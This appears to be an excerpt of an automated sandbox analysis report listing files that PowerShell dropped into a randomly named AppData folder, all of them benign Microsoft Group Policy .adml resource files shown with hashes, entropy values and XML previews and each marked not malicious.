                                                                                          SHA-256:0AC43A8DF0E8795968C0F9B6ECC6FBF620B761C128545AD689EEC5DFF21F5F1D
                                                                                          SHA-512:653B9905DC0BBDE62F06EFA1C613F4E4A0823331D31D396DB0226FDB41A9AD4D148C1B5DABFA0CA64A74156F5AD446428F3344FFE75828A7C8225D3F0D214758
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppCompat">Application Compatibility</string>.. <string id="AppCompat_Prevent16BitMach_Help">Specifies whether to prevent the MS-DOS subsystem (ntvdm.exe) from running on this computer. This setting affects the launching of 16-bit applications in the operating system.....You can use this setting to turn off the MS-DOS subsystem, which will reduce resource usage and prevent users from running 16-bit applications. To run any 16-bit application or any application with 16-bit components, ntvdm.exe must be allowed

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AppXRuntime.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (394), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4462
                                                                                          Entropy (8bit):4.744620806615911
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:jJpm5IJUVaBfgHt6kNEmB+kClbNpbj03V:Xc3AIHF20F
                                                                                          MD5:BF19DB2E91EDEFE517515BA23B30103E
                                                                                          SHA1:324D98B315D7F8E096D8D61505610706D0C73856
                                                                                          SHA-256:42778994D23CDB74C446E70C30942991E89DF6AACC1225AEBB05464D69DA6DEC
                                                                                          SHA-512:9C193CD9597F90913643CDD2079E36930E60B6AB539D96BA0D5DA7EA2B5DDE0B78D7451D0A4AC37CBBB8A90C548285FBF640099EDA949665E186586D893ADB14
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>App runtime</displayName>.. <description>App runtime policies</description>.. <resources>.. <stringTable>.. <string id="AppxRuntime">App runtime</string>.. <string id="AppxRuntime_Help">Contains settings to manage the behavior of Windows Store apps.</string>.. <string id="AppxRuntimeBlockFileElevation">Block launching desktop apps associated with a file.</string>.. <string id="AppxRuntimeBlockFileElevationExplanation">This policy setting lets you control whether Windows Store apps can open files using the default desktop app for a file type. Because desktop apps run at a higher integrity level than Windows Store apps

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AppxPackageManager.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3093
                                                                                          Entropy (8bit):4.7903363478779735
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:c0Jx8gm9JcfSB2W27u0jX9X/f4kvqGbRG4QXzgtWFV:jJpm9Jc62Dv5bRjWFV
                                                                                          MD5:B182F0B429A84D7E97C3D50EADF154A5
                                                                                          SHA1:87DDA04EDCFE5E6C22F0224D9EE8375E0920B7F6
                                                                                          SHA-256:5CD8B222AECBDEAC3DF2DE6B774AF7E02988981136F6E5E9CD3D12735C6A6416
                                                                                          SHA-512:C42670FA053734C1B909FBB1AE189D4ACF72B290679C1564D78276022BDF0AFD279558C608F00953325E5AEE47EB93DF35C5AFDBB29F698E5C8F808610DB5055
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. displayName and description are not used. Not supported by current Group Policy tools. -->.. <displayName>Appx Package Manager</displayName> .. <description>Appx Package Manager</description>.. <resources>.. <stringTable>.. <string id="AppxDeployment">App Package Deployment</string>.. <string id="AppxDeploymentAllowAllTrustedApps">Allow all trusted apps to install</string>.. <string id="AppxDeploymentAllowAllTrustedAppsExplanation">This policy setting allows you to manage the installation of trusted line-of-business (LOB) Windows Store apps.....If you enable this policy setting, you can install any LOB Windows Store app (which m

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AttachmentManager.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (564), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):9845
                                                                                          Entropy (8bit):4.7103779388766025
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmiPXXvXd0GkXgueX0dX0LhTW9jS+9FMDPaSPL9DVH60XZgn9ZE60Y2IHm0s:EZHvmQ/WXtyPHPLuV3HmEPdHK
                                                                                          MD5:156ADEBCA5CD43E0D849F921B26594C3
                                                                                          SHA1:0DCDA3A3C5CDB824D7FAE9FD2D52638DE6BAC841
                                                                                          SHA-256:6974AEBDCB65AB63DECD224D3C060F0AFCA11E00C781657EAD44F64073094BF8
                                                                                          SHA-512:32DC4890719AAEBC7CB5A088EF7C4FD7A86207C36E76C0FA60584E3DF0687C2DF297CBF82750885BCD42542700BD0D14011D57D9CED9FC32E582F70061C68013
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AM_AM">Attachment Manager</string>.. <string id="AM_CallIOfficeAntiVirus">Notify antivirus programs when opening attachments</string>.. <string id="AM_EstimateFileHandlerRisk">Trust logic for file attachments</string>.. <string id="AM_ExplainCallIOfficeAntiVirus">This policy setting allows you to manage the behavior for notifying registered antivirus programs. If multiple programs are registered, they will all be notified. If the registered antivirus program already performs on-access checks or scans

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AuditSettings.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1846
                                                                                          Entropy (8bit):4.78689414618934
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gmsYLytG4rpdfUMo5mvS3bHpWdPV:LeD5pmvWvp+5wwWNV
                                                                                          MD5:71075FCE08402095AEAFBE57962A1F5B
                                                                                          SHA1:F76FAE255AA5454217FE973C4A8035EC9005B923
                                                                                          SHA-256:6928FAAD9624BBF4C74F6C138496A4C6AE8D04919C3DE9591568300C1DD39E59
                                                                                          SHA-512:9DF7480E584B16D1B504E2503B3C4C8422EFC2FA37D9A4ACEB8A7AEA0561C0D73E8E73CB21FEA20C6EC3BBBCB715C155EFDA7B8E38B7B448BCDA5DB10D773DE4
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Audit Process Creation</displayName>.. <description>Configuration settings for auditing process creation.</description>.. <resources>.. <stringTable>.. <string id="AuditSettings">Audit Process Creation</string>.. <string id="IncludeCmdLine">Include command line in process creation events</string>.. <string id="IncludeCmdLine_explain">This policy setting determines what information is logged in security audit events when a new process has been created.....This setting only applies when the Audit Process Creation policy is enabled. If you enable this policy setting the command line information for every process will be logged in plain tex

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AutoPlay.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4884
                                                                                          Entropy (8bit):4.732776627339853
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmCRsKp7RqiPKhB3a1jejcM64iVDJaqV:ELRRp74a1AbodJ7
                                                                                          MD5:935C602DAD3F4335BD16C269E66DBFAA
                                                                                          SHA1:3DF4DC6D55AF20F0593D807FB4FDEFB23CC3355A
                                                                                          SHA-256:8773998440C8D534FA69833174D05D09088F07E6E5C0E41D7C04A229C7903879
                                                                                          SHA-512:05ABFFC0CE836F7438BC711A9D2B5CEB8F3F1C48BE2AC9C1A91D286AED6FC4C8D740AE802DCD2CC65D066972DC8DAA84AD8A10FA775D66CB5F3DE34688D975EC
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoPlay">AutoPlay Policies</string>.. <string id="AutoPlay_Help">Configure various AutoPlay behaviors.</string>.. <string id="NoAutorun">Set the default behavior for AutoRun</string>.. <string id="NoAutorun_Help">This policy setting sets the default behavior for Autorun commands..... Autorun commands are generally stored in autorun.inf files. They often launch the installation program or other routines..... Prior to Windows Vista, when media containing an autorun command is inserte

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Biometrics.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (381), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4309
                                                                                          Entropy (8bit):4.706598922443907
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:oD5pmJFp5A8M9DIn0C3ppMdiD+BukevPCRTqCV:+Mp5lM9M3ppUiC2vPClP
                                                                                          MD5:C32F834C78DC4DB3C12084AB5115E4A5
                                                                                          SHA1:BE211306E8BA801EDD43E68E28F98947354A35BC
                                                                                          SHA-256:4222D7C39B72F570C01F76EE084278BD32619D039F197A1AAE0B508C4E2CAF32
                                                                                          SHA-512:2551575C490A8B4C36FD0E44B4E7C27693DF94C74715BC0F242BE2F947AE2AF097D574AC1823F3ACC71E8D69C17D6257192AAB1255B25C3122F4196C10B9F674
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Biometrics Configuration Settings</displayName>.. <description>Biometrics Configuration Settings</description>.. <resources>.. <stringTable>.. <string id="BiometricsConfiguration">Biometrics</string>.. <string id="Biometrics_EnableBio">Allow the use of biometrics</string>.. <string id="Biometrics_EnableBio_Help">This policy setting allows or prevents the Windows Biometric Service to run on this computer... ..If you enable or do not configure this policy setting, the Windows Biometric Service is available, and users can run applications that use biometrics on Windows. If you want to enable the ability to log on with biometrics, yo

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Bits.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (534), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):32159
                                                                                          Entropy (8bit):4.887654356231583
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:Uw9+2pWqx80t3lMsQAZ5nV7smu7CQ62TDw4p2L:H+2Lx8Q3lLB+wx
                                                                                          MD5:F6E746CD330A73B928C14770D9645BD0
                                                                                          SHA1:7EDED72EB36035A93AF3943B6F5F330082307968
                                                                                          SHA-256:80D730B14BBB66B29360C108C8A57E09AA33E57DC1C9EAFFCAD5D66B3EF98C31
                                                                                          SHA-512:6295E9062941DAEDCF4BF3E5BEBA03010AFDE880F43E95052DBCE3FDB485C92C73B0CB57E9374F691C79FA43044CFCBBDB92CDE189E1C3AFF90024B19B525F1E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Supported Platforms -->.. <string id="SUPPORTED_WindowsXPSP2WindowsNETSP1orBITS20">Windows XP SP2 or Windows Server 2003 SP1, or computers with BITS 2.0 installed.</string>.. <string id="SUPPORTED_WindowsXPWindowsNETorBITS15">Windows XP or Windows Server 2003, or computers with BITS 1.5 installed.</string>.. <string id="SUPPORTED_Windows7OrBITS35">Windows 7 or computers with BITS 3.5 installed.</string>.. <string id="SUPPORTED_Windows8OrBITS5">Windows 8 or Windows Server 2012 or Windows RT or computers

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CEIPEnable.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1949
                                                                                          Entropy (8bit):4.91759301234844
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yMPs9IsKiz+d9Wz+fWz+MJe4UNr2ce4u5qHLuB1XR0r:cgeD5x8gm8fKfiI9W+WwUzqG1XGPV
                                                                                          MD5:CB1E5DCF00DD4AA26834F7F02EA4AA0E
                                                                                          SHA1:EAEBB6A75FE6AEEC3AFE914DF9DAD9BCB08702C1
                                                                                          SHA-256:7651F59A99180721F39B02391BB51D382B39DBCD15E3E2245B10778B7A8A5D95
                                                                                          SHA-512:BC84BD30E99735495803360F061088334736CAF9D7AE1C5FAD9C484D949991F09C59D6FB818DE35F6328E94FEDD63C2C6D80D63ACDF616BF936762CBF656AE3A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WindowsCEIPCat">Windows Customer Experience Improvement Program</string>.. <string id="CorporateSQM">Allow Corporate redirection of Customer Experience Improvement uploads</string>.. <string id="CorporateSQMExp">If you enable this setting all Customer Experience Improvement Program uploads are redirected to Microsoft Operations Manager server.....If you disable this setting uploads are not redirected to a Microsoft Operations Manager server.....If you do not configure this setting uploads are not redirect

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\COM.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1670
                                                                                          Entropy (8bit):4.895822032017801
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yr7g9f8rbcFCv/9g4+4R4ldQ8o9+YPb+aDDWFV:cgeD5x8gm8fKN2fcFC2u47QxQ3aDDWFV
                                                                                          MD5:33757EAC0441251ACE18BD74FF8E2BD0
                                                                                          SHA1:B9DBC0B240CF803AFACB5D8D9AD26E39B757B04B
                                                                                          SHA-256:44FA3B1E818EF70305AD41012D78CF140851EC0949D4F2457F60C295E31C8EDC
                                                                                          SHA-512:5FB7BD40C37EAB269C7E9CF72EFB29D6A6A2EF76DB29DADD628866143A15FCEE46C865BE54C66D7C6ADE13766FF1A3028912BDF8BE05F1A6CD69D254431180C2
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppMgmt_COM_SearchForCLSID">Download missing COM components</string>.. <string id="AppMgmt_COM_SearchForCLSID_Help">This policy setting directs the system to search Active Directory for missing Component Object Model (COM) components that a program requires.....Many Windows programs, such as the MMC snap-ins, use the interfaces provided by the COM components. These programs cannot perform all their functions unless Windows has internally registered the required components.....If you enable this policy setting

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CipherSuiteOrder.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (1488), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6011
                                                                                          Entropy (8bit):5.030765177000099
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmTKr0l1CSYNTV5vDiUFO3q6fWbKldN6joV:EqMRbaW+HN6c
                                                                                          MD5:F7E00A4ABE6853A853D65FB722604674
                                                                                          SHA1:9CFD9B20C60FB7024F91A7902D84182081427D7F
                                                                                          SHA-256:4E01B6A54C1B3933D33645729AF7F69E50D687C37DB985A924917E6F8ACAB15B
                                                                                          SHA-512:2ADAC9CDA13B12F0C2B2F7E9C9B943B50BE9A217FB32B486F783A5D842A820F2F2928E5336DE6E4FCA4B5CD9FC4F2D7FAA09F6C8285550CA7B3BD19E0CE4CA8B
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SSLConfiguration">SSL Configuration Settings</string>.. <string id="SSLCipherSuiteOrder">SSL Cipher Suite Order</string>.. <string id="SSLCipherSuiteOrder_Help">This policy setting determines the cipher suites used by the Secure Socket Layer (SSL)..... If you enable this policy setting, SSL cipher suites are prioritized in the order specified..... If you disable or do not configure this policy setting, the factory default cipher suite order is used..... SSL2, SSL3, TLS 1.0 and T

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Conf.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10980
                                                                                          Entropy (8bit):4.778547657476326
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmrrC2ZHEU5p5a4LH/+3SenetLKZHtpeL3DKTGbpKPKryy6JI5oyvr5UV:ESrC2RlFagcSenetKZHtOzrKPKrB5xj+
                                                                                          MD5:797657FCFBC025F92F896B0095D1F6E4
                                                                                          SHA1:F357F8B9A9671F711EAE5BEB7759A2EF73B953E9
                                                                                          SHA-256:032F6BB5FBA082CA24EA70F6CBDC25E913FD43B68A44582AB30AEB29509FC2ED
                                                                                          SHA-512:9C90FEE9737A7F66CD50B43C30A2BA05DC861A76618612DC744F7075D3296DDE577589060D3CC5779E44CA14ADD42502420DCDF9A68825817795FC89418847DD
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowPersistAutoAcceptCalls">Allow persisting automatic acceptance of Calls</string>.. <string id="AllowPersistAutoAcceptCalls_Help">Make the automatic acceptance of incoming calls persistent.</string>.. <string id="AppSharing">Application Sharing</string>.. <string id="AudioVideo">Audio &amp; Video</string>.. <string id="DisableAdvCallingButton">Disable the Advanced Calling button</string>.. <string id="DisableAdvCallingButton_Help">Disables the Advanced Calling button on the General Optio

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ControlPanel.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (545), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6210
                                                                                          Entropy (8bit):4.659729688008146
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm0xrbTb9qSrboXpqjKq+F6TzGQ5wtt1cvWebgbPWLSrbTpKb9LbpqjKm+xN:EXx19axpuN52t16W7WW7p4Xxt49tY
                                                                                          MD5:02F20EFB8F224DE1BECE4FA4FADF1442
                                                                                          SHA1:16091D04A7A93CC21A3935841D1F30C643C2A782
                                                                                          SHA-256:2D07C5B7079ED696AA73A4806A1B1FEB2863B6A579033EF1F0A10E3D5D5E5FBC
                                                                                          SHA-512:D7239C57FA747F36C770D68BBDF31354A9C53D7A7AA3530CE7367FE612CE04B903142CDBBFCBAC11098D47E00D58B0C6620EF18CE324AD9933CBEB0FB5B6D15D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisallowCpls">Hide specified Control Panel items</string>.. <string id="DisallowCpls_Help">This setting allows you to display or hide specified Control Panel items, such as Mouse, System, or Personalization, from the Control Panel window and the Start screen. The setting affects the Start screen and Control Panel window, as well as other ways to access Control Panel items, such as shortcuts in Help and Support or command lines that use control.exe. This policy has no effect on items displayed in PC settings...

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ControlPanelDisplay.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (334), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):21011
                                                                                          Entropy (8bit):4.7324938774717955
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:VfRyKGkSDgF+vXDtchtrWzsbHX92eLb2vB1E4RRN9:VfRXTCrvXDWrWziN2ZvB1fRX
                                                                                          MD5:61CB7046C23A14515C58521DAD36AB6F
                                                                                          SHA1:62EC7A88975656944FD8CA72924A916336112465
                                                                                          SHA-256:A4F9A17502E8ABA9E82C5C324CBED40E109A565CA2E27B3D79389F1A595B3CCD
                                                                                          SHA-512:13473DEADE6477440D9515C9FC6BABECDB59FE9A806633B003B14E71EC6E762DD9E13A9BFD1DFED554D7CA6A664B3C1EF0CEB7C8278F22CC0E0EEB793E697C1F
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Display">Display</string>.. <string id="CPL_Display_Disable">Disable the Display Control Panel</string>.. <string id="CPL_Display_Disable_Help">Disables the Display Control Panel.....If you enable this setting, the Display Control Panel does not run. When users try to start Display, a message appears explaining that a setting prevents the action.....Also, see the "Prohibit access to the Control Panel" (User Configuration\Administrative Templates\Control Panel) and "Remove programs on Settings menu" (User Configuration\Administrative Templates\Star

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Cpls.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1585
                                                                                          Entropy (8bit):4.924174965870825
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEBWNvHjWy8XGkjR7S2kjeRqZ+RguJb+RguJM6dGQEn:cgeD5x8gm8fKlBWN7WyeOuJ3uJv3EFV
                                                                                          MD5:3A236D3ED9A6EAE336DE47BD71132D58
                                                                                          SHA1:621C59891B91951F2E863EEFEA2D8310FB5125E3
                                                                                          SHA-256:EF075F5436A4117C29F2D6689A8ED6ACC3BA22EAFBDEEA20C2349DBA5CFE1F33
                                                                                          SHA-512:862AABB60EFFAC016188CF56BB6EC48F7E4F6847B4A1A4A525C1FD93DAA0269E0CB02DC8362F5B3029F817D1096B8C5BB48FA1717FE4084E2A99CDE13A3CE573
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Users">User Accounts</string>.. <string id="Users_Help">Contains settings to control the behavior of User Accounts</string>.. <string id="UseDefaultTile">Apply the default account picture to all users</string>.. <string id="UseDefaultTile_Help">This policy setting allows an administrator to standardize the account pictures for all users on a system to the default account picture. One application for this policy setting is to standardize the account pictures to a company logo.....Note: The default acc

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CredSsp.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):20162
                                                                                          Entropy (8bit):4.80118154121946
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EYLfqDwf4tdJ11wpL9uiansm9cjoOkfmW/MQfB:9qtVPaxu5mUTOYJ
                                                                                          MD5:3F887766536AE5C7677E841C9A1E86F6
                                                                                          SHA1:C3BFB966D06DF84A5BD9FCDD9C0CAF23A4F85B28
                                                                                          SHA-256:91A36F497D459EF96B4CEDB88EE0884651D8B5C0EABCE1C1F4FEC6D49FF71A31
                                                                                          SHA-512:7777FF19B4B1108A2688D02F25AC69E3F66D87F44A42AD60596B447188728B231E148E67390B39B7CBCF62E83121ECB55A84CB3D72A55827C0489FADABA5469C
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowDefaultCredentials">Allow delegating default credentials</string>.. <string id="AllowDefaultCredentials_Explain">This policy setting applies to applications using the Cred SSP component (for example: Remote Desktop Connection).....This policy setting applies when server authentication was achieved by using a trusted X509 certificate or Kerberos.....If you enable this policy setting, you can specify the servers to which the user's default credentials can be delegated (default credentials are those that you

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CredUI.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3126
                                                                                          Entropy (8bit):4.730467503379261
                                                                                          Encrypted:false
